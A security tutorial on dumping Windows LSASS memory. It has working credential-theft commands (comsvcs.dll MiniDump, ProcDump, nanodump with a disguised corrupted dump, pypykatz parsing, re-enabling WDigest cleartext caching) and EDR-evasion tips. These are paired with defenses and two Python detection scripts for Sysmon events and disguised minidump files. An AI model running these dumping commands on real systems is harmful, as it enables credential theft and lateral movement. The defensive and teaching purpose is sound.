Introduction / Overview
Disclaimer: This article is for education and authorized security testing only. Dumping LSASS memory extracts credentials belonging to other users and is a high-impact action. Only perform these techniques on systems you own or have explicit written permission to test. Unauthorized credential access is a crime in most jurisdictions.
The Local Security Authority Subsystem Service (lsass.exe) is the heart of Windows authentication. It caches secrets in memory: NTLM hashes, Kerberos tickets, and — depending on configuration — cleartext passwords. For an attacker who has already gained local administrator or SYSTEM on a host, dumping LSASS is one of the fastest paths to lateral movement and domain dominance.
In this article you'll learn four reliable ways to produce an LSASS dump — the LOLBin comsvcs.dll MiniDump export, Sysinternals ProcDump, the EDR-evasive nanodump, and offline parsing with pypykatz — and, just as importantly, how a blue team detects and blocks each one. This maps to MITRE ATT&CK T1003.001 (OS Credential Dumping: LSASS Memory).
How it works / Background
When a user authenticates interactively, LSASS loads several Security Support Providers (SSPs) such as wdigest, kerberos, tspkg, and msv1_0. These SSPs hold credential material in the process's address space so the OS can perform single sign-on. Mimikatz and its descendants don't exploit a vulnerability — they simply read this memory.
There are two stages to every attack:
- Acquisition — create a full memory image of lsass.exe. This requires the SeDebugPrivilege (granted to local admins) and read access to the process. The Windows API call underneath nearly all tools is MiniDumpWriteDump from dbghelp.dll.
- Extraction — parse the resulting .dmp offline (ideally on the attacker's machine) to recover secrets. Doing the parse offline avoids running a flagged tool like mimikatz.exe on the target.
Modern Windows complicates stage 1 with Credential Guard (VBS-isolated LSA secrets), RunAsPPL (LSASS as a Protected Process Light), and EDR sensors that hook MiniDumpWriteDump and watch for handles opened against lsass.exe.
Prerequisites / Lab setup
- A Windows 10/11 or Server 2019+ VM where you are an administrator.
- A second domain user logged on interactively (so there are extra credentials to recover).
- An attacker box (Kali/Linux) with pip install pypykatz.
For a realistic lab, leave Credential Guard off initially and enable it later to observe the difference. To repopulate cleartext WDigest credentials (legacy, off by default since Server 2012 R2):
# Lab only - re-enables cleartext password caching in LSASS
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" `
/v UseLogonCredential /t REG_DWORD /d 1 /f
Log off and back on for the change to take effect.
Attack walkthrough / PoC
1. comsvcs.dll MiniDump (living off the land)
comsvcs.dll ships with every Windows install and exports a MiniDump function callable via rundll32. No tool needs to be dropped.
# Get the LSASS PID ($pid is a read-only automatic variable in PowerShell, so use another name)
$lsassPid = (Get-Process lsass).Id
# rundll32 comsvcs.dll, MiniDump <PID> <outfile> full
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsassPid C:\temp\lsass.dmp full
The arguments are positional: PID, output path, and the literal keyword full. This LOLBin technique is heavily signatured today, but it remains useful because nothing is written to disk except the dump itself.
2. ProcDump (signed Microsoft binary)
ProcDump is signed by Microsoft, so it often slips past application allow-listing. The -ma flag writes a full memory dump.
procdump.exe -accepteula -ma lsass.exe C:\temp\lsass.dmp
Some EDRs block by process name, so dumping by PID can help:
procdump.exe -accepteula -ma (Get-Process lsass).Id C:\temp\lsass_pid.dmp
3. nanodump (evasive, in-memory)
nanodump is a Beacon Object File / standalone PE that reimplements the minidump format without calling MiniDumpWriteDump, avoiding the most common EDR hook. It can also clone the LSASS handle, use a duplicated handle, or write an invalid/corrupted minidump signature that you fix up offline to defeat signature scanning.
# Standalone build: write a dump with a corrupted signature
nanodump.exe --write C:\temp\report.docx
Restore the valid signature on the attacker box before parsing:
python3 restore_signature.py report.docx
The --fork option dumps a forked clone of the process and --valid writes a normal signature if evasion isn't needed.
4. Parse offline with pypykatz
Move the dump to your Linux box and parse it without ever running Mimikatz on the target:
pypykatz lsa minidump lsass.dmp
Typical output includes the msv (NT hash), wdigest, and kerberos sections:
== LogonSession ==
authentication_id 184639
username CORP\jdoe
== MSV ==
Username: jdoe
NThash: 8846f7eaee8fb117ad06bdd830b7586c
== WDigest [00050cf2]==
password: SuperSecret123!
Feed the recovered NT hash straight into a pass-the-hash workflow — see my notes on Pass-the-Hash and lateral movement and Kerberoasting for what to do next.
Mermaid diagram
Diagram: an admin acquires debug rights, opens an LSASS handle, dumps memory via one of three methods, then parses it offline with pypykatz to harvest credentials for lateral movement.
Detection & Defense (Blue Team)
Defense must address both prevention (stop the dump) and detection (catch the attempt).
Prevention
- Enable RunAsPPL. Running LSASS as a Protected Process Light blocks unprotected processes from opening a read handle, defeating ProcDump and comsvcs.dll outright (attackers then need a vulnerable signed driver — BYOVD — to strip protection).
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" `
/v RunAsPPL /t REG_DWORD /d 1 /f
- Enable Credential Guard (VBS) so LSA secrets live in an isolated trustlet (lsaiso.exe). Dumps then contain no usable plaintext or reusable hashes for protected sessions.
- Disable WDigest by ensuring UseLogonCredential is 0 (the default) so cleartext passwords are not cached.
- Microsoft Defender Attack Surface Reduction (ASR) rule "Block credential stealing from the Windows local security authority subsystem" (GUID 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2) blocks the read of LSASS memory.
Add-MpPreference -AttackSurfaceReductionRules_Ids 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 `
-AttackSurfaceReductionRules_Actions Enabled
Detection
- Sysmon Event ID 10 (ProcessAccess) targeting lsass.exe with access masks containing 0x1010/0x1410/0x1438 (PROCESS_VM_READ | PROCESS_QUERY_INFORMATION) is the strongest single signal. SwiftOnSecurity's Sysmon config flags this by default.
- Windows Security Event 4656/4663 with object \Device\...\lsass.exe when SACL auditing is enabled.
- Hunt for rundll32.exe command lines containing comsvcs and MiniDump, and for procdump usage with -ma.
- Alert on new .dmp files (or oddly named files like report.docx that are actually MDMP) written by suspicious processes.
- Watch for handle duplication and direct system calls — nanodump's hallmark is reading LSASS without the usual dbghelp call stack, so behavioral EDR rules that baseline the call stack of memory reads catch it where signature rules fail.
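The Sysmon Event ID 10 rule, the call-stack check and the command-line hunts from the list above, as an added Python example that is not part of the original article or of any of the tools it mentions. It parses the "Field: value" layout of the Sysmon event message, decodes GrantedAccess, and only alerts when the handle carries PROCESS_VM_READ against lsass.exe from an image outside an allow-list. The four event records, the image paths, the call-trace offsets and the BASELINE_SOURCES allow-list are all constructed for the example; build the real allow-list from your own baseline.

```python
import re
from typing import Dict, List

# Process access rights that matter for reading LSASS memory (Windows constants).
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400

# Image basenames that open LSASS on a healthy host. Assumed placeholder allow-list
# for this example; derive the real one from your own Sysmon baseline.
BASELINE_SOURCES = {"csrss.exe", "wininit.exe", "msmpeng.exe"}

# Four constructed Sysmon Event ID 10 records in the "Field: value" layout of the
# event message. Paths, offsets and the Defender platform folder are made up.
SAMPLE_EVENTS = [
    r"""SourceImage: C:\Windows\System32\rundll32.exe
    TargetImage: C:\Windows\System32\lsass.exe
    GrantedAccess: 0x1FFFFF
    CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d4d4|C:\Windows\System32\KERNELBASE.dll+2bd9e|C:\Windows\System32\dbgcore.DLL+12f3a|C:\Windows\System32\comsvcs.dll+3a1b0""",
    r"""SourceImage: C:\ProgramData\Microsoft\Windows Defender\Platform\0.0.0.0\MsMpEng.exe
    TargetImage: C:\Windows\System32\lsass.exe
    GrantedAccess: 0x1000
    CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d4d4|C:\ProgramData\Microsoft\Windows Defender\Platform\0.0.0.0\MsMpEng.exe+1c2d0""",
    r"""SourceImage: C:\Users\jdoe\Downloads\report.exe
    TargetImage: C:\Windows\System32\lsass.exe
    GrantedAccess: 0x1010
    CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d4d4|C:\Users\jdoe\Downloads\report.exe+2b40""",
    r"""SourceImage: C:\Windows\System32\svchost.exe
    TargetImage: C:\Windows\System32\svchost.exe
    GrantedAccess: 0x1FFFFF
    CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d4d4""",
]

FIELD_RE = re.compile(r"^\s*(\w+):\s*(.*?)\s*$", re.M)


def parse_event(text: str) -> Dict[str, str]:
    """Turn the 'Field: value' lines of a Sysmon event message into a dict."""
    return {m.group(1): m.group(2) for m in FIELD_RE.finditer(text)}


def image_name(path: str) -> str:
    """Lower-cased basename of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def triage_process_access(event: Dict[str, str]) -> List[str]:
    """Reasons an Event ID 10 record looks like an LSASS memory read (empty = benign)."""
    reasons: List[str] = []
    if image_name(event.get("TargetImage", "")) != "lsass.exe":
        return reasons
    access = int(event.get("GrantedAccess", "0"), 16)
    if not access & PROCESS_VM_READ:
        return reasons  # without VM_READ this handle cannot copy memory out
    source = image_name(event.get("SourceImage", ""))
    if source in BASELINE_SOURCES:
        return reasons
    reasons.append(f"{source} opened lsass.exe with PROCESS_VM_READ (GrantedAccess {access:#x})")
    trace = event.get("CallTrace", "").lower()
    if "dbghelp.dll" not in trace and "dbgcore.dll" not in trace:
        # A dumper that avoids MiniDumpWriteDump leaves no dbghelp/dbgcore frame.
        reasons.append("call trace has no dbghelp/dbgcore frame: MiniDumpWriteDump-free read")
    return reasons


def analyze_events(raw_events: List[str]) -> List[Dict[str, object]]:
    """Run the triage rule over raw event texts and collect the findings."""
    findings: List[Dict[str, object]] = []
    for raw in raw_events:
        event = parse_event(raw)
        reasons = triage_process_access(event)
        if reasons:
            findings.append({"source": event.get("SourceImage", ""), "reasons": reasons})
    return findings


# Process-creation (Sysmon Event ID 1) command-line patterns from the hunting list.
CMDLINE_RULES = [
    ("comsvcs.dll MiniDump via rundll32", re.compile(r"rundll32.*comsvcs.*minidump", re.I)),
    ("procdump full dump (-ma)", re.compile(r"procdump.*\s-ma\b", re.I)),
]


def match_command_line(cmdline: str) -> List[str]:
    """Names of the hunting rules a command line triggers."""
    return [name for name, rx in CMDLINE_RULES if rx.search(cmdline)]


if __name__ == "__main__":
    for finding in analyze_events(SAMPLE_EVENTS):
        print(finding["source"])
        for reason in finding["reasons"]:
            print("  -", reason)
```

Running it flags the rundll32 record (full access, dbgcore present, so one reason) and the unknown report.exe (VM_READ with no dbghelp frame, two reasons); the Defender record is ignored because 0x1000 carries no VM_READ right, and the svchost record because its target is not LSASS. The allow-list is matched on basename only, so pair it with a signer or hash check in production rather than trusting the name.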
A layered approach (RunAsPPL + Credential Guard + ASR + Sysmon ID 10) raises the cost dramatically: the attacker is forced into BYOVD or kernel-level tradecraft that is itself noisy.
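The fourth detection item in the list above (a file named like a document that is really an MDMP) as an added Python example, not code from the original article or from any project it names. It parses the 32-byte MINIDUMP_HEADER from the Windows SDK (signature "MDMP", version word 0xA793, stream count, directory RVA, flags) so a file is judged by content rather than extension, and reports whether the MiniDumpWithFullMemory flag is set. The sample headers are constructed for the example and contain no process memory; the last one has a zeroed signature to show that a content check misses a dump whose signature was deliberately corrupted, which is exactly the nanodump evasion the article describes.

```python
import os
import struct
from typing import Dict, Iterator, Optional, Tuple

# MINIDUMP_HEADER layout (minidumpapiset.h), 32 bytes little-endian:
# Signature, Version (low word 0xA793 + implementation word), NumberOfStreams,
# StreamDirectoryRva, CheckSum, TimeDateStamp, Flags (MINIDUMP_TYPE bits).
HEADER = struct.Struct("<4sHHIIIIQ")
MINIDUMP_SIGNATURE = b"MDMP"
MINIDUMP_VERSION = 0xA793
MINIDUMP_WITH_FULL_MEMORY = 0x00000002  # set on full-memory dumps (the "full" keyword)


def parse_minidump_header(data: bytes) -> Optional[Dict[str, int]]:
    """Return the header fields if data starts with a valid minidump header, else None."""
    if len(data) < HEADER.size:
        return None
    sig, version, impl, streams, dir_rva, checksum, stamp, flags = HEADER.unpack_from(data)
    if sig != MINIDUMP_SIGNATURE or version != MINIDUMP_VERSION:
        return None
    return {"impl_version": impl, "streams": streams, "dir_rva": dir_rva,
            "checksum": checksum, "timestamp": stamp, "flags": flags}


def classify(name: str, head: bytes) -> Dict[str, bool]:
    """Triage verdict for one file from its name and its first 32 bytes."""
    hdr = parse_minidump_header(head)
    is_dump = hdr is not None
    ext = os.path.splitext(name)[1].lower()
    return {
        "minidump": is_dump,
        "full_memory": is_dump and bool(hdr["flags"] & MINIDUMP_WITH_FULL_MEMORY),
        "disguised": is_dump and ext != ".dmp",  # dump content behind a non-.dmp name
    }


def scan_directory(root: str) -> Iterator[Tuple[str, Dict[str, bool]]]:
    """Walk a tree and yield verdicts for every file whose header parses as a minidump."""
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "rb") as fh:
                    head = fh.read(HEADER.size)
            except OSError:
                continue
            verdict = classify(fn, head)
            if verdict["minidump"]:
                yield path, verdict


def sample_header(flags: int, signature: bytes = MINIDUMP_SIGNATURE) -> bytes:
    """Constructed 32-byte header for the example; it carries no process memory."""
    return HEADER.pack(signature, MINIDUMP_VERSION, 0, 3, HEADER.size, 0, 0, flags)


# Constructed sample files (name -> first 32 bytes).
SAMPLES = {
    "lsass.dmp": sample_header(MINIDUMP_WITH_FULL_MEMORY),
    "report.docx": sample_header(MINIDUMP_WITH_FULL_MEMORY),  # renamed full dump
    "quarterly.docx": b"PK\x03\x04" + bytes(28),              # a real Office file is a zip
    "invalid_sig.docx": sample_header(MINIDUMP_WITH_FULL_MEMORY, b"\x00\x00\x00\x00"),
}

if __name__ == "__main__":
    for name, head in SAMPLES.items():
        print(name, classify(name, head))
```

Point scan_directory at a staging location such as C:\temp or user Downloads folders; the disguised report.docx is caught, while invalid_sig.docx is not, which is why this file check complements rather than replaces the Sysmon Event ID 10 signal, which fires at handle-open time regardless of what is later written to disk.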
Conclusion
LSASS dumping remains a top-tier credential-access technique because the secrets are right there in memory by design. On the offensive side, success is mostly about evasion: choosing a method (LOLBin, signed binary, or MiniDumpWriteDump-free nanodump) that your target's EDR doesn't catch, then parsing offline so Mimikatz never touches disk. On the defensive side, RunAsPPL and Credential Guard turn an easy win into a hard, loud operation, and Sysmon Event ID 10 makes the attempt visible even when prevention is incomplete. Test both sides in your lab — understanding detection is what makes you a better operator.
References
- MITRE ATT&CK — T1003.001 OS Credential Dumping: LSASS Memory
- HackTricks — Stealing Windows Credentials
- Microsoft — Configuring Additional LSA Protection (RunAsPPL)
- Microsoft — Credential Guard overview
- Fortra — nanodump on GitHub
- skelsec — pypykatz on GitHub
- Microsoft — ProcDump (Sysinternals)